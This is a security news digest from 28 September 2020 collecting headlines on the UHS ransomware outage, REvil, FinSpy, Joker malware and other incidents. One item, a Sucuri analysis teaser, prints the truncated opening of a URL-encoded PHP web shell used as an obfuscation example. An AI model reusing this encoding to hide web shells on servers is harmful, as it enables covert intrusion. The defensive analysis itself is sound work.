27-09-202029-09-2020

Security daily (28-09-2020)

US medical provider UHS blames 'security issue' for major outage

Computer networks at Universal Health Services, which describes itself as one of the largest health care providers in the U.S., were down Monday due to what the company described as “an IT security issue.” Multiple media outlets, including NBC News, suggested UHS’s IT network had been hit by ransomware and that some nurses had reverted to pen and paper. In a statement, UHS, which says it oversees 400 hospitals, did not address whether the company had suffered a ransomware attack. A company spokesperson did not respond to multiple requests for comment. “Patient care continues to be delivered safely and effectively” and “no patient data appears to be compromised,” the UHS statement said. It’s the latest in a series of cybersecurity incidents to affect health care facilities during the coronavirus pandemic. The most serious occurred this month when a patient in Germany died after being turned away from a hospital that was hit […] The post US medical provider UHS blames 'security issue' for major outage appeared first on CyberScoop. (CyberScoop)

Weeks before Election Day, Putin trolls the US with an offer for cyber truce

Add the prefix “cyber” to any concept common in geopolitics — diplomacy, norms and so on — and the resulting phrase immediately becomes less precise than its parts. The latest example is “truce,” courtesy of none other than Russian President Vladimir Putin. Putin didn’t use “cyber truce” in a statement Friday that called for the U.S. and Russia to create “a comprehensive program of practical measures to reboot our relations in the field of security in the use of information and communication technologies (ICTs).” But the term fits. The former KGB agent’s proposal was otherwise broad and vague. He mentioned nothing about Russia’s well-documented misdeeds in cyberspace, and he made no accusations about what the U.S. might be doing in response. The White House dismissed Putin’s proposal in a statement to the New York Times, and Russia-watchers expressed the usual caution. Russia is interfering in our elections today, at this moment, […] The post Weeks before Election Day, Putin trolls the US with an offer for cyber truce appeared first on CyberScoop. (CyberScoop)

REvil ransomware crew dangles $1,000,000 cybercrime carrot

When a company pays a multimillion dollar ransomware blackmail demand, where do you think the money goes? (Naked Security)

Naked Security Live – “SMS scams: keep yourself and your family safe!”

Naked Security Live - here's the recorded version of our latest video. Enjoy. (Naked Security)

Hack Lets You Track The International Space Station With An NES

(News ≈ Packet Storm)

Feds Warn Disinformation Will Be Spamming US Voters

(News ≈ Packet Storm)

Airbnb Bug Let You Read Other People's Account Messages

(News ≈ Packet Storm)

UHS Hospital Network Hit By Ransomware Attack

(News ≈ Packet Storm)

Backdoor Obfuscation: tempnam & URL Encoding

In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code. During a recent investigation, we came across an interesting backdoor that was leveraging encoding along with common PHP functions to conceal its operations from any active security systems on the host.

This PHP web shell uses the following obfuscation method, where the web shell code is stored in URL encoded format and assigned to the variable $i: <?php $i = rawurldecode("%3C%3Fphp%0A%20settimelimit%280%29%3Berrorreporting%280%29%3Bif%28getmagicquotesgpc%28%29%29%7Bforeach%28%24POST%20as%20%24key%3D%3E%24value%29%7B%24POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20htm ... Continue reading Backdoor Obfuscation: tempnam & URL Encoding at Sucuri Blog. (Sucuri Blog)

Researchers Uncover Cyber Espionage Operation Aimed At Indian Army

Cybersecurity researchers uncovered fresh evidence of an ongoing cyberespionage campaign against Indian defense units and armed forces personnel at least since 2019 with an aim to steal sensitive information. Dubbed "Operation SideCopy" by Indian cybersecurity firm Quick Heal, the attacks have been attributed to an advanced persistent threat (APT) group that has successfully managed to stay (The Hacker News)

Red Team — Automation or Simulation?

What is the difference between a penetration test and a red team exercise? The common understanding is that a red team exercise is a pen-test on steroids, but what does that mean? While both programs are performed by ethical hackers, whether they are in-house residents or contracted externally, the difference runs deeper. In a nutshell, a pen-test is performed to discover exploitable (The Hacker News)

Windows 7 ‘Upgrade’ Emails Steal Outlook Credentials

Researchers warn of emails pretending to help business employees upgrade to Windows 10 - and then stealing their Outlook emails and passwords. (Threatpost)

Mac, Linux Users Now Targeted by FinSpy Variants

FinSpy has returned in new campaigns targeting dissident organizations in Egypt - and researchers uncovered new samples of the spyware targeting macOS and Linux users. (Threatpost)

Universal Health Services Ransomware Attack Impacts Hospitals Nationwide

The Ryuk ransomware is suspected to be the culprit. (Threatpost)

Joker Trojans Flood the Android Ecosystem

September saw dozens of Joker malware variants hitting Google Play and third-party app stores. (Threatpost)

Twitter Warns Developers of API Bug That Exposed App Keys, Tokens

Twitter has fixed a caching issue that could have exposed developers' API keys and tokens. (Threatpost)

27-09-202029-09-2020

/security-daily/ 29-09-2020 23:44:27